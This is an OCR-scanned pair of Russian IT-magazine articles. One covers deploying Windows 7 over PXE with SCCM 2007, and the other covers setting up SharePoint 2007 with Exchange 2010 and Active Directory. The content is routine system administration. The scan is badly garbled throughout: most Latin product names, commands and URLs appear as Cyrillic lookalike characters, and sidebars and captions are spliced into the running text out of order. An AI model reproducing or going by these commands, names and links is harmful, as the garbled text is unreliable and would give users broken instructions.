пещЬ: 

>пекз]т 

пекзііхІЬср 

пекзЪ. сШср>зегѵег \\зупаск.ги 

Добавляем тег 60 со строкой РХЕСНепі: 
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> ІПІО 

•Для установки 5ССМ 
20075Р2 на ѴѴіп2к8Р2 
потребуется 50Ь 
5егѵег20055РЗ. 

• Технология 2его 
ТоисЬ позволяет 
получить полн остью 
готовый к работе 
компьютер, просто 
подключив его ксети и 
не нажав при этом ни 
одной клавиши. 

• За счет поддержки 
пгшШсазГ можно 
распространять образ 
сразу на несколько 
компьютеров сети. 

• РСЮЫ (РиНуОиаИТеб 
Оотаіп Ыате, полно- 
стью определенное 
имя домена] — имя 
домена, не имеющее 
неоднозначностей в 
определении. Вклю- 
чаетвсебя имена 
всех родительских 
доменов. 

• Подробнее о МОТ 
201 0 читай в статье 
«Сетевая рассада», 
опубликованной в 
октябрьском номере 
□С за 2009 год. 

• Подробнее об уста- 
новке и некоторых воз- 
можностях 5ССМ 2007 
смотри в ~і~ за август и 
сентябрь 2009 года. 

• Отом, какисполь- 
зоватьѴѴАІКдля 
создания ѴѴІМ -об- 
разов, читай в статье 
«Самосборные окна» 
январского номера - !" 
за 2009 год. 




НАСТРАИВАЕМ ПАРАМЕТРЫ ОБЛАСТИ 
йНСР-СЕРВЕРА 



пеСзЪ. с!Ъ.ср>ас1с1 орЕіопсІеІ: 60 РХЕСІіепС ЗСгіпд О 
соттепГ: = РХЕ зиррогС 

пеЕзЪ. <ТЬср>зеС орріопѵаіие 60 5ТКІШ РХЕСІіепС 
пеЕзЪ. сІІіср>ехіГ: 

УСТАНОВКА РОЛИ РХЕ В 5ССМ Вызываем СопЯ^игагіоп 
Мапа^ег Сопзоіе и переходим в 5іге БагаЪазе 5іге 
Мапа^етепг, где выбираем наш сайт 5ССМ, он у нас пока 
один под номером 001 (из консоли можно управлять 
несколькими сайтами 5ССМ) . Теперь идем в 5іге Зеггіп^з 
5іге Зузгетз и выбираем свой сервер. В среднем окне будет 
показан список установленных ролей. Запускаем мастер 
установки новых ролей, выбрав в контекстном меню пункт 
«Ыеѵѵ Коіез». На первом шаге указываем ЕС^БЫ сервера 
5ССМ, на втором будет предложено к установке 9 ролей, нас 
интересует «РХЕ зегѵісе роіпі». Отмечаем и идем дальше. 
Всплывающее сообщение предупреждает, что для РХЕ- 
запросов должны быть открыты ІГОР-порты 67-69 и 401 1 . 
Настройки на следующем шаге позволяют задать пароль 
для доступа к РХЕ (полезно, чтобы кто-то специально или 
случайно не вызвал установку ОС), указать конкретные 
сетевые интерфейсы, на которых будут приниматься 
РХЕ-запросы (по умолчанию на всех), и задержку ответа 
сервера. Указываем учетную запись, от имени которой 
будет производиться доступ к базе данных (по умолчанию 
системный пользователь), и генерируем/импортируем 
сертификат. В случае создания сертификата необходимо 
указать лишь срок окончания (в настройках год) . Ставим. 
При необходимости можно изменить любой из указанных 
параметров, вызвав окно свойств выбранной роли. Теперь у 
нас все готово для нормального функционирования 05Б. 

ЗАГРУЗОЧНЫЕ ОБРАЗЫ Далее нужно добавить обра- 
зы систем, которые будем распространять. Переходим в 
«Сотршег Мапа§етепГ -> ОрегаГіп§ ЗузГет Оеріоутепг»; 
здесь нам предстоит выполнить дальнейшие настройки. В 
«ВооГ Іта§е5» уже находятся два ѴѴіпРЕ-образа (х86 и х64), 
номер сборки (6.1.7600.16385) которых совпадает с версией 
ѴѴіп2к8К2 и ѴѴіп7 (самый простой способ узнать номер - это 
посмотреть на цифры в имени 150 образа на офсайте) . При 
необходимости можно самостоятельно добавить новый РХЕ- 
образ в коллекцию, взяв его с загрузочного диска или собрав 
самостоятельно (кстати, несколько загрузочных образов 
можно найти в каталоге Рго§гат РіІезХМісгозоІГ СопН^игагіоп 
Мапа§ег\ОЗП\ЪооГ) . Выбираем «АсЫ ВооГ Іта§е» и вводим 
сетевой ІЖС-путь к ѴѴІМ-файлу. После его анализа мастер 



позволит указать индекс системы в образе (в ѴѴІМ может быть 
несколько систем) . Указываем имя, описание и коммента- 
рий. Теперь следует добавить образ в точку распростране- 
ния: отмечаем и раскрываем дерево настроек, переходим в 
подпункт «БізітіЪітоп Роіпгз» (либо выбираем одноименный 
пункт в контекстном меню) и, выбрав «Мапа§е ПізггіЪигіоп 
Роіпгз», запускаем визард. На втором шаге определяется 
действие. Оставляем предложенный по умолчанию пункт 
«Сору гЬе раскате го пеѵѵбізггіЪигіопз роіпгз», и далее мастер 
посоветует отметить флажком точку распространения, куда 
будет скопирован образ. После установки роли РХЕ в списке 
будут две точки распространения: сервер 5ССМ (например, 
згѵОІ) и скрытая сетевая папка (\\5КѴ01\5М5РХЕІМАСЕ5$) . 
Нас интересует последняя, отмечаем и заканчиваем работу 
мастера, нажав несколько раз ЫехГ. Здесь, кстати, всплывает 
один интересный момент, на который часто попадаются 
новички. Дело в том, что 5ССМ является оболочкой, которая 
принимает команды и затем последовательно их выполняет. 
Копирование образа обычно занимает значительное время, а 
в консоли сообщение «Іта§е іпзгаііесі зиссеззйіііу» появляется 
практически мгновенно. На самом же деле он еще копиру- 
ется, и для его распространения нужно немного подождать. 
Текущий статус можно просмотреть, перейдя в Раскате 
5ГаШ5. Стандартный РЕ-образ может не содержать некото- 
рых драйверов для сетевых карт или харда, что помешает 
процессу установки. Добавить драйвер можно во вкладке 
«ѴѴіпсІоѵѵз РЕ» окна свойств образа. Здесь же активируется 
поддержка командной строки (по клавише < Е8 > ) . Лишние 
дрова добавлять не стоит, так как все они будут загружены 
в ОЗУ (и так размер образа ѴѴіпРЕ требует наличия на кли- 
ентском компьютере не менее 5 12 Мб оперативки) . После 
добавления драйверов образ на точке распространения 
автоматически обновится. Поддержка тиШсазГ активирует- 
ся в ПізГгіЬиГіоп 5еггіп§. Такая установка позволит распро- 
странять образ сразу на несколько компьютеров сети. Если 
образов много, то добавлять драйвера удобнее во вкладке 
«Пгіѵегз». Здесь просто указываем на каталог с драйверами и, 
опционально, образы, к которым их следует подключить. 

ДО Б АВ Л Я Е М О Б РАЗ О С О 5Б предлагает дв а метода установ- 
ки: при помощи ѴѴІМ-образов, используемых в ОС, начиная с 
Ѵізга, и из сетевой папки (как КІ5) . Установочный образ мож- 
но взять с дистрибутивного диска, собрать свой вариант или 
захватить с эталонной системы. Последний вариант очень 
удобен при наличии большого числа однотипных систем, к 
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ДОБАВЛЯЕМ УСТАНОВОЧНЫЙ ѴѴІМ-ОБРАЗ 
ОС 



тому же он позволяет создать ѴѴІМ-образ для распростра- 
нения ѴѴіпХР. Однако из-за возможных проблем с НАЬ для 
установки ѴѴіпХР предпочтительнее использование сетевых 
папок. Стоит учитывать еще один момент: 5ССМ поддержи- 
вает захват образа ОС только при традиционной разметке 
харда, захват невозможен с составных томов, КАШ 0, 1 и 
5 . Процесс добавления установочного ѴѴІМ-образа ѴѴіп7 и 
Ѵізііа также прост. Переходим в «Орегайп§ Зузиет Іта§е5» 
и, выбрав ссылку «АсЫ Орегайп§ ЗузИет Іта§е5», запускаем 
мастер. Указываем ЕПМС-путь к файлу іп5іаД.ѵѵіт, который 
копируем с установочного диска. На следующем шаге 
мастер выведет информацию об ОС в образе, но обычно ѴѴІМ 
содержит несколько версий ОС, поэтому будет показана 
только первая. Нажимаем ЫехИ и ждем, пока образ появится 
в списке. Далее в БізітіЪіійоп Роіпіз добавляем его в точку 
распространения. Здесь все как для загрузочного образа. 
Кроме того, надо создать пакет установки агента 5ССМ (он 
будет затребован при развертывании) и прочих программ, 
которые должны устанавливаться на клиентскую ОС при 
развертывании образа, и опубликовать пакет на точке 



Новая версия 
5ССМ — 8ССМ. 
Ыехі; 

Уже доступна первая информация о следующей 
версии 8ССМ, которая известна под кодовым названием 
ЗССІѴШехі:. В ней полностью переработана консоль адми- 
нистрирования, и теперь она стала более удобной. Концеп- 
ция ролевого доступа КВАС (КоІеВазесІАссезз) позволяет 
распределить обязанности между администраторами, 
консоль при этом будет показывать только доступные поль- 
зователю функции, а не все, как в 5ССМ 2007. В качестве 
системы отчетов используется только ЗС^Ь Кероггіп^. От- 
ныне требуется наличие 64-битных версий ОС и ЗС^Ь Зегѵег 
2008. Из других изменений стоит отметить: 

• возможность производить запланированные обновления 
образов системы; 

• контроль полосы пропускания на точке распространения; 

• механизм оповещения, позволяющий создавать сигналы 
при наступлении определенных событий, интегрирован с 
МоЪіІе Иеѵісе Мапа^ег (менеджер автоматизации обмена 
данными между КПК и компом) . 




МАСТЕРУПРАВЛЕНИЯ ТОЧКОЙ РАСПРОСТРАНЕНИЯ 



распространения. Это все проделывается в меню Раска^ез; 
подробное описание процесса распространения агентов и 
программ смотри в предыдущих статьях. 

СОЗДАНИЕ ПОСЛЕДОВАТЕЛЬНОСТИ ЗАДАЧ Теперь, когда 
все, что необходимо для установки, у нас под рукой, пред- 
пишем 5ССМ последовательность задач (1:а5к5е^иепсе). 

Для этого переходим в ОЗЭ к пункту Тазк 5е^иепсе и 
запускаем процесс создания задачи Ыеѵѵ — Тазк 5е^иепсе. 
Появится очередной визард, на первом шаге которого 
отмечаем «Іпзіаіі ап ехізгіп^ іта^е раскате», затем вводим 
имя задачи и описание. В поле «Вооі Іта§е» задаем нужный 
загрузочный образ. Переходим к шагу «Іпзіаіі ѴѴіпсіоѵѵз», 
где выбираем образ и версию ОС, вводим ключ. По умолча- 
нию учетная запись локального администратора отклю- 
чается, но можно установить пароль. Если взведен флажок 
«Рапшіоп апй іогтаі іаг^еі: . . .», перед развертыванием ОС 
жесткий диск будет переразмечен. Переходим к следую- 
щему шагу, где прописываем рабочую группу или домен, к 
которой/которому должен подключаться компьютер (для 
ввода хоста в домен мастер запросит учетную запись, об- 
ладающую соответствующими правами) . На шаге «Іпзіаіі 
Сопй§М§г» будет предложено выбрать местоположение 
пакета с агентом 5ССМ. В Зіаіе ті^гагіоп при необходи- 
мости разрешаем захват настроек пользователя, сетевых 
и системных установок, для чего указывается ІІЗМТ-пакет 
(его нужно предварительно создать) . При установке на 
чистую машину снимаем все флажки. Следующие два шага 
отвечают за установку обновлений и программ (соответс- 
твующие пакеты должны быть созданы) . Просматриваем 
резюме и заканчиваем работу мастера. 

После создания новая задача появится в окне менеджера. 
Выбрав задачу, ее можно экспортировать (и импортиро- 
вать, соответственно, на другой системе), отредактиро- 
вать, дублировать, просмотреть и поправить свойства. 

В свойствах задания можно задать промежуток времени, 
через который оно будет деактивировано, программу, 
запускаемую перед выполнением задания, клиентскую 
платформу, и назначить разрешения. 

Редактор задания, вызываемый по нажатию кнопки 
Есій, предоставляет возможность изменить большее 
количество настроек (всего 7 пунктов) . Например, по 




> СІѴСІ 

В видеоролике 
мы покажем, как 
настроить компонен- 
ты 5ССМ20075Р2 
для развертывания 
ѴѴі псіоѵѵз 7. 




ПНТТР://ѴѴѴШ 

"■ Г 

> Ііпкз 

• Страница 5ССМ 
2007 на ТесЬЫеІ; — 
ІесЬпейтісговоЙ. 
сот/ги-ги/ 
сопіідтдг 

• Ресурс 5ССМ 2007 — 
ѵѵѵѵѵѵ.пп іеговой .сот/ 
вувіетсепіег/ 
сопіідигаі 
іоптападег 
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СОЗДАЕМ НОВУЮ ПОСЛЕДОВАТЕЛЬНОСТЬ ЗАДАЧ 



умолчанию диск будет разбит на один раздел; 
чтобы изменить эту схему, идем в Раггігіоп 
Дізк 0. Если есть файл ответов, добавляем его 
в пункте «Арріу Орегагіп^ Зузгет». Перейдя 
в «Арріу ѴѴіпсІоѵѵз 5етп§5», меняем регис- 
трационные данные (имя, организация, 
лицензионный ключ), часовой пояс. Сетевые 
настройки корректируются в Арріу пенѵѵогк 
зетп^з. И, наконец, управлять драйверами 
можно в Арріу Деѵісе Дгіѵегз. Для каждой 
настройки доступна вкладка «Оргіопз», где 
можно отключить текущий шаг или, исполь- 
зуя различные переменные, указать условия 
(например, версия ОС) . 

Осталось привести наше задание в действие, 
назначив его определенной коллекции. По 
умолчанию в 5ССМ уже имеется несколько 
коллекций. Предусмотрена такая возмож- 
ность для того, чтобы в рабочей среде избе- 
жать недоразумений. Например, когда на 
ноутбук гостя будет производиться установка 
ОС, лучше создать отдельную коллекцию. 

Для этого просто переходим в Соііесгіопз, вы- 
бираем Ыеѵѵ Соііесгіоп и следуем указаниям 
мастера, оставляя значения, предлагаемые по 
умолчанию. Подробнее о создании коллекции 
смотри в августовском номере. Теперь при- 
меняем задание. Выбираем в контекстном 



меню задачи пункт «Асіѵегнізе». В первом окне 
мастера выбираем коллекцию, к которой 
будет применяться задание. Обязательно 
отмечаем «Маке гіііз шзк 5е^иепсе аѵіаІаЫе 
Ю Ъооі: тебіа апсі РХЕ». Следующий шаг 
позволяет задать время, с которого задание 
начнет выполняться, опционально - время 
окончания. Параметр «МапДаЮгу аззі^птепі;» 
задает принудительную установку, его можно 
включать только при полной уверенности в 
правильности установок. Далее определяем 



доступ к контенту, здесь можно оставить 
предлагаемое по умолчанию «ОоѵтІоаД 
сопіепі: Іосаііу ...». На заключительном этапе 
настраиваются предупреждения и прогресс- 
бар, указываются разрешения. В принципе, 
здесь можно оставить настройки, предлагае- 
мые мастером. 

Все готово к старту клиента. Включаем 
компьютер, в ВІ05 устанавливаем загрузку по 
сети, и через некоторое время должен появить- 
ся экран загрузки ѴѴіпРЕ. ЛС 



НАЗНАЧАЕМ ЗАДАНИЕ ДЛЯ КОЛЛЕКЦИИ 
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НЕ ХВАТАЕТ ЧЕГО-ТО 
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ЗУИ/АСК 



■ ■ СЕРГЕЙ ЯРЕМЧУКСКШОЕКгаЗѴМАСК.&и, МАРТИН ПРАНКЕВИЧ иКВАЫ.РКАМКЗТЕРгаеМАП.СОМ 



Симбиотическая 

СВЯЗЬ 

НАСТРАИВАЕМ СВЯЗКУ 5НАРЕРОІЫТ2007р ЕХСНАЫ6Е 5ЕРѴЕР 2010 
И АСТІѴЕ йІРЕСТОРУ 

Богатые возможности, расширяемость, гибкость в настройках и управле- 
нии позволили платформе БЬагеРоіпі: стать стандартом де-факто среди 
решений для обеспечения совместной работы и воздвижения корпо- 
ративных веб-порталов. Потратив несколько вечеров, можно освоить 
основные приемы работы с ЗЬагеРоіпі и затем зарабатывать, предлагая 
услуги по его развертыванию и сопровождению. 



НЕМНОГО О 5НАРЕР0ІИТ Для начала опре- 
делимся с конфигурацией будущей систе- 
мы. Начнем с ЗЬагеРоіпі:, который является 
средством, позволяющим быстро построить 
корпоративный (и не только) веб-портал. Та- 
кой портал имеет все необходимое для обмена 
информацией как внутри офиса, так и вне его 
(скажем, для командировочных сотрудников 
или филиальных отделений) — блоги, ѵѵікі, 
форумы, публикация документов, новостей, 
галереи рисунков, средства коллективной 
работы — календарь, задачи с диаграммами 
Ганта, хранилище документов с возможностью 
контроля версий, доступа и прохождения по 
организации любого документа. Например, 
посетитель оформил заявку на покупку товара, 
сразу же формируется нужный документ и 
цепочка ответственных. Каждый пользователь 
имеет профайл, из которого легко получить 
о нем нужные сведения (некое подобие соци- 
альной сети) . Плюс мощная система отчетов, 
способная извлекать данные из различных 
источников (документы Ехсеі, базы и т.п.) 
Список возможностей можно продолжать 
очень долго. Причем администратор узла сам 
решает, какие компоненты будут включены в 
портал, а какие нет. 

Для доступа к информации используется 
веб-браузер, что снимает ограничения на 
клиентскую ОС и предоставляет возможность 
работать с доступными сервисами ЗЬагеРоіпі; 
с любого компьютера, имеющего выход на 
корпоративную сеть. Все это достаточно 
просто управляется и вдобавок интегрируется 
с приложениями и серверами/сервисами, 

► іі4 



в частности, М5 ОШсе и ЕхсЬап^е Зегѵег. 
Любой документ публикуется прямо из окна 
приложения М5 ОШсе или наоборот, при 
редактировании вызывается М5 ѴѴогб/ЕхсеІ. 
Собственно эта троица, плюс поддержка Асгіѵе 
БігесШгу (служба каталогов используется для 
хранения учетных записей пользователей, 
проверки подлинности и упрощения управле- 
ния доступом), часто является определяющей 
при выборе этой платформы для организации 
порталов на ѴѴіпсІоѵѵз-серверах. 

В настоящее время предлагается 5 компонен- 
тов, имеющих непосредственное отношение 
к ЗЬагеРоіпі:; так как часто путают их назна- 
чение, необходимо внести ясность. В самом 
низу линейки стоит ѴѴіпсІоѵѵз ЗЬагеРоіш 
Зегѵісез (ѴѴБ8, оШсе .тісгозоШ сот/еп-из / 
зЬагероіпНесІтоІо^ѵ) — бесплатное реше- 
ние, обладающее базовыми возможностями, 
необходимыми для организации совместной 
работы. Предшественником ѴѴ55 были допол- 
нения Бі^паі БазЫюагсІ Кезоигсе Кп (БОНК) 
для Оіпіоок и ВаскОШсе, выпущенные в конце 
1999 года. Как развитие новой концепции 
«электронной приборной панели» появилась 
технология Бі^паі БазЬЪоагсІ (ББ), согласно 
которой ББ является настраиваемым решени- 
ем на основе М5 ОШсе, объединяющим любую 
корпоративную информацию в единую среду. 
Чуть позже ББКК и ВаскОШсе стали частью 
Місгозоіт ЕгошРа^е и получили новое имя 
ЗЬагеРоішТеат Зегѵісез. В 2001 году Місгозоіт 
представила еще один продукт — ЗЬагеРоіпі: 
Рогсаі Зегѵег 2001, но уже имеющий несколько 
иное назначение — организация коллектив- 



ной работы и централизованного документо- 
оборота в средней и крупной компании. Вот 
здесь и началась путаница, поэтому политика 
наименований вскоре была пересмотрена, 
теперь говорят о технологии или платформе 
ЗйагеРоіпі:. Флагманом платформы является 
Місгозоіт ОШсе ЗЬагеРоіш Зегѵег (М058, оШсе. 
тісгозоШсот/еп-из/зЬагероіпЩегѵег) — ком- 
мерческий продукт, являющийся надстрой- 
кой над ѴѴ55 и интегрирующий технологию 
ЗЬагеРоіпі: в приложения М5 ОШсе. Здесь уже 
доступно на порядок большее количество 
инструментов и, соответственно, возможнос- 
тей — каталог ЗКе Бігесюгу, диспетчер ЗКе 
Мапа^ег, элементы Зосіаі Иеіѵѵогкіп^ ѴѴеЪ Раиз, 
однократная регистрация 550 и др. Причем, в 
зависимости от выбранной лицензии 5тапсіагсі 
или Ешегргізе САЬ, они будут отличаться. 

Сам по себе ЗЬагеРоіпі: может нормально ра- 
ботать и без внешнего почтового сервера, но, 
использовав ЕхсЬап^е, мы получаем возмож- 
ность контроля сообщений, фильтрации спама 
и вирусов. Стоит учитывать, что с каждой но- 
вой версией ЕхсЬап^е все больше ориентирует- 
ся на обработку сообщений, оставляя функции 
документооборота и коллективную работу 
ЗЬагеРоіпі:. Кроме того, ЗЬагеРоіпі: является 
отличной заменой общим папкам ЕхсЬап^е, 
с которыми могут работать пользователи 
ЗЬагеРоіш, публикуя документы и получая 
уведомления обо всех изменениях. 

НАЧНЕМ С ЕХСНАЫСЕ 201 0 В релизе ЕхсЬап^е 

2010 ( ѵѵѵѵѵѵ.тісго5ОІі:.сот/ехсЬапуе/2010/т) 

появилось достаточно большое количество 
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новшеств. Основные изменения направлены на повышение надеж- 
ности и доступности электронной почты в крупных распределенных 
ИТ-структурах, помимо этого, ставилась задача по упрощению адми- 
нистрирования и обеспечению совместимости с популярными сегодня 
мобильными устройствами. Так, сервер подружился с платформами 
ЗутЪіап, Арріе и Раіт и браузерами Еігеіох и Заіагі. Как и обещалось, 
теперь поддерживаются только 64-х битные ОС (это требование отно- 
сится ко всем продуктам новой линейки 2010) . Полностью переработа- 
на система хранения данных и кластеризации. Применена новая тех- 
нология БАС (ПатЪазе АѵаіІаЪіІііу Сгоирз), упрощающая мониторинг 
состояния, контроль целостности и восстановление данных. Снижение 
интенсивности операций ввода-вывода позволило увеличить произ- 
водительность в полтора раза. Упрощен перенос почтового ящика, 
который теперь осуществляется в «горячем» режиме. Реализована 
новая модель разграничения прав на управление почтовыми ящиками, 
в которой применена концепция ролевого доступа КВАС (Коіез-Вазеб 
Ассезз Сощгоі) . 

Для установки ЕхсЬап^е 2010 понадобится ѴѴіп2к8 или К2 (все х64), 
консоль управления — Ѵізііа (х32 или х64) . Сервер должен быть заведен 
в домен АБ, функциональный уровень которого не ниже ѵ\чп2кЗ . То есть 
в ѴѴіп2к8 ставим роль «Асгіѵе Бігесюгу Ботаіп Зегѵісез» и запускаем 
мастер бсргото (подробнее о настройке контроллера домена смотри в 
апрельском номере ц-Е за 2007 год и ноябрьском номере щ за 2008 год) . 
После выбора ЗеШр.ехе мастер предложит установить: 

- МісгозоГк . ЫЕТ Егатехѵогк 3.5; 



Теперь готовим схему АБ и домена: 

> Зекир /РгерагеЗскета 

> Зекир /РгерагеБотаіп 

В принципе, можно обойтись и без этих команд, но они упрощают 
последующие настройки. 

Далее запускаем установщик и следуем его указаниям. На этапе 
«Кеабіпезз Скескз» будут проверены все необходимые зависимости; 
если что-то программе не понравится, будет выдана подсказка. После 
устранения недочетов установку начинаем сначала. По окончании 
идем на перезагрузку. Дальнейшие настройки можно производить при 
помощи ЕМС (ЕхсЬап^е Мапа^етепі: Сопзоіе) или командной строки 
(ЕхсЬап^е Мапа^етепі: ЗЬеІІ) . 

УСТАНОВКА 5НАРЕР0ІЫТ На момент написания этих строк была до- 
ступна бета ЗЬагеРоіпі: Зегѵег 2010 (слово «ОШсе» убрано из названия), 
но мы его трогать пока не будем. К релизу наверняка что-то изменится, 
к тому же после его установки на ѴѴіп2к8К2 возникает ряд проблем, в 
частности, невозможен корректный запуск ряда сервисов (например, 
Мапа^еб Маіасіаіа, требуемый некоторым другим службам), поэтому 
возьмем версию 2007. 

Минимальные системные требования, необходимые для установки 
М055, фактически совпадают с таковыми для ѴѴ55 : компьютер с СРЕГ — 
2,5 ГГц, 1 Гб НАМ (лучше 2 Гб), на харде должно быть не менее 3 Гб 
свободного места. Расчет же реально требуемой мощности, необ- 



- ЭДіпсіош® Кетоке Мападетепк (ШіпКМ) 2.0 Соішттіку 



Тескпоіоду Ргеѵіеѵ^ 3 (СТРЗ) ; 
- Шіпйашш РотлюгЗкеІІ Ѵ2 СТРЗ . 



Но не будем тратить время на скачивание и установку каждого компо- 
нента в отдельности, лучше откроем консоль и накатим все необходи- 
мое (вместе с потенциальными зависимостями) одной командой: 

> ЗегѵегМападегСтб -іпзкаіі ЫЕТ-Ргаше^огк РЗАТ-АББЗ 
МеЪ-Зегѵег МеЪ-МекаЪазе ЭДеЪ-Ьдсу-Мдтк-СопзоІе МеЪ- 
ІЗАРІ-Ехк ЫЕТ-НТТР-Аскіѵакіоп МеЪ-Вазіс-Аикк МеЪ- 



Портал на платформе \Ѵ55 полностью интегрирован с дру- 
гими решениями МісгозоЙ:. Например, информация из Оіпіоок 
отображается на портале и наоборот, для доступа используется единая 
учетная запись — граница между этими приложениями получается 
довольно условная. Аналогично офисные файлы, размещенные на пор- 
тале, редактируются в приложениях М5 ОШсе, результат сохраняется 
обратно. Новый офисный файл легко публикуется прямо из программы. 



Бідезк-АикЪ. ШеЪ-Шпбсжз-АикЪ. ШеЬ-Буп-Сошргеззіоп КРС- 
оѵег-НТТР-ргоху ШеЪ-Ыек-Ехк -гезкагк 

Также нам потребуется «2007 ОШсе ЗузЩт Сопѵепег: Місгозоіт Еікег 
Раск» Г ^о.тісгозо1і:.сот/Ш1іпк/?Еіпкі(і= 123380) — набор фильтров 
для ІЕікегз, обеспечивающих индексацию содержимого офисных 
файлов (.босх, .бост, .рргх, .ррцп, .хізх и других). 

В процессе установки появилось требование, не описанное ни в 
одном из источников. Выразилось в такой ошибке: «Тке зіаП: тобе Іог 
Ше Пек ТСР Рогг 5Ьагіп§ зегѵісе тизгЬе зет ш АіЛотагісЪеІоге 5ешр 
сап сощіпие». Просто переводим данный сервис в автоматический 
режим запуска: 

Р8> 8ек-8егѵісе ЫекТсрРогкЗЬагіпд -ЗкагкирТуре 
Аикотакіс 



Используя готовые шаблоны ЗЬагероіпі:, можно легко создать портал, 
удовлетворяющий условиям любого заказчика, в том числе саіі-центр, 
службу поддержки или электронную библиотеку. 

ЗеагсЬ Зегѵег 2008 Ехргезз — бесплатный компонент для ѴѴ55, обеспечи- 
вает возможность поиска по всем хранилищам документов, используя 
ІЕікегз. Без него поиск возможен только по отдельному узлу. В М055 
такая функциональность заложена изначально, ничего доустанавли- 
вать не требуется. 

ОЗЗрасез ѴѴогкрІасе (уѵм/млоЗзрасез.ог^) — это основанная на 
технологии ѴѴеЪ 2.0 кросс-платформенная система управления 
документами и совместной работы. Выполнена в виде надстройки к 
ОрепОШсе.ог^, ЗііагОШсе и М3 ОШсе. Позиционируется как альтер- 
натива ЗЬагеРоіпк 
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•Ресурс, посвя- 
щенный МІСГ050ІІ 
Оііісе БЬагеРоіпі 
Бегѵег — оііісе. 
т і егозой .со т/е п- 
из/зЬагероіпІзегѵег . 

•Детальное сравне- 
ние версий БЬагеРоіпІ: 
можно найти в 
документе МісгозоЙ 
ОйісеБЬагеРоіпі 
5егѵег2007 ргосіисіз 
сотрагізоп — ойісе. 
тісгозоЙ.сот/еп-из/ 
зЬагероіпІзегѵег/ 

НА1 01978031 033. 
азрх . 



•Ресурс М5 
ЕхсЬапде Бегѵег 
2010 — ѵѵѵѵѵѵ. 
ті егозой .сот/ 
ехсЬапде/201 0/ги . 

• Системныетребо- 
вания, предъявляе- 
мые ЕхсЬапде 201 0, 
описаны вдокументе 
«ЕхсЬапде 2010 Бузует 
Редиігетепіз»: 
ѵѵѵѵѵѵ.ітіісгозоЙ. 
сот/ехсЬапде/2010/ 
ги/ги/зузіет- 
гедиігетепіз.азрх 

•Документ«Іп5ІаІІ 
ѴѴіпсІоѵѵз Бегѵег 
2008 ЕеаіигезѵѵііЬ 
зегѵегтападегстсі» — 
Ыодз.ІесЬгериЫіс. 
сот.сот/ 
баіасепіег/?р=294 

•Блог, посвященный 
БЬагеРоіпі — 

Ыодз.тзсіп.сопп/ 

зЬагероіпі . 




ПРОГРАММАУСТАНОВКИ ЕХСНАМ6Е2010 
ПРАКТИЧЕСКИ НЕ ИЗМЕНИЛАСЬ 

ходимой для обслуживания конкретной организации, 
вручную провести весьма проблематично, да и в этом нет 
необходимости. Місгозоіт предлагает утилиту Бузиет Сетег 
СарасПуРІаппег (БССР) 2007, позволяющую на основе 
ответов на вопросы моделировать различные приложения 
и оценивать их работу в разных вариантах развертывания. 
Скачать БССР можно со страницы загрузки тісгозоГйсот/ 
зузиетсетег/зсср . В качестве ОС рекомендуется ѴѴіп2кЗ в 
версиях БііапсІагсІ/Епііегргізе/Паііасепііег/ѴѴеЪ Ебійоп (х32/ 
х64) . Но ѴѴ55/М055 можно без особых проблем установить 
и на новые версии серверных ОС — ѴѴіп2к8/5Р2/К2. Исходя 
из требований производительности и безопасности, не 
стоит устанавливать БЬагеРоіпі: на том сервере, на котором 
функционирует Ехс1іап§е. Также нужно иметь в виду, что 
БЬагеРоіпі: требует наличия службы БМТР-Бегѵег, которая 
будет конфликтовать с ЕхсЬап§е. 

Сам процесс установки как \У55, так и МОББ практически 
не отличается, поэтому все сказанное ниже, в том числе 
и настройки, касается обоих вариантов. Для начала нам 
понадобится Місгозоіт .ИЕТ и поддержка А5Р.ИЕТ в 115: 

> ЗегѵегМападегСтсІ -іпзТаІІ йЕТ-Егатеѵ\гогк ШеЬ- 

Азр-ЫЕТ 

Чтобы БЬагеРоіпі: принимал письма с вложениями и затем 
сохранял их в библиотеки документов, необходим 5МТР- 
сервер из комплекта ѴѴіпсІоѵѵз, он будет взаимодействовать 
с любым другим почтовым сервером. Нужный компонент в 
ѴѴіп2к8 ставится просто: 

> ЗегѵегМападегСтсІ -іпзкаіі ЗМТР-Зегѵег 

В качестве БС^Ь-сервера можно использовать как платный 
М5 БСД, Бегѵег от 2005, так и БСД, Бегѵег 2005 ЕтЪесМесІ 
Ебійоп (МБЕЕ) . Последний будет установлен автоматичес- 
ки при выборе варианта Вазіс. Но учитывая его ограни- 
чения (1 СРИ, 1 Гб адресуемой памяти и максимальный 
размер базы — 4 Гб) , в больших организациях целесообраз- 
нее использовать полноценный БС^Ь-сервер. 

Скачиваем дистрибутив \У55 (х64) с офсайта и запуска- 
ем инсталлятор. В процессе предстоит определиться с 
вариантом установки — Стандартная (Вазіс, автономная 
установка на отдельный сервер в стандартной конфигу- 
рации) или Расширенная (Абѵапсесі) . Второй вариант 
позволяет установить ѴѴ55 на ферму серверов и дает больше 
возможностей по настройке, в частности, можно подклю- 
чить внешний БСД, Бегѵег вместо МБЕЕ. Пока нам это не 
нужно. Выбираем Стандартная и ждем, когда закончится 



ѵ 




СТАНДАРТНАЯ УСТАН0ВКА5НАКЕР0ШТ 
НЕДОСТАВИТХЛОПОТ 

установка. По окончании отмечаем флажок «Запустить 
мастер настройки технологий и продуктов БЬагеРоіпі» и 
следуем подсказкам мастера, задача которого — создать 
необходимые базы и инициализировать \У55, установив и 
сконфигурировав сервисы. Сам мастер предельно автома- 
тизирован, он лишь запросит выполнить перезапуск служб 
115 и БЬагеРоіпі:, а дальше сделает все сам. Результатом его 
работы будут: стандартный узел контента и узел БЬагеРоіт 
Сепітаі Асітіпізіігайоп. Посмотреть их можно, набрав 
Гіггр : //имя_узла, для входа используем логин и пароль 
учетной записи, имеющей админские права. 

Установка МОББ в режиме Вазіс аналогична, поэтому идем 
дальше. Следующие настройки также актуальны для обеих 
версий БЬагеРоіпі:, поэтому разделять их не будем. 

НАСТРОЙКИ Е-МАН.В5НАКЕР0ІЫТ При наличии соот- 
ветствующих прав будут доступны функции настройки 
конкретного веб-узла, которые можно произвести из меню 
«Действия узла». Настройки же ѴѴ55 в целом производятся 
в «Центре Администрирования БІіагеРоіпі» (БЬагероіпі: 
Асітіпізіігайоп Сетег), вызвать который можно через ярлык 
в меню «Пуск». Обрати внимание на номер порта, который 
используется для доступа к сайту. Для каждой установки 
ѴѴ55 он будет отличаться. При необходимости его можно 
изменить на странице свойств сайта в консоли управле- 
ния 115 (Біііез — БІіагеРоіпі: Сепітаі Асітіпізіігайоп ѵЗ — Біііе 
Віпсііп^з) . Подсмотреть нужную цифирь также позволяет 
командная утилита зізасіт (зіізасіт -о ^еіасітіпрогі:) . 

На первой странице будет выведен список первостепенных 
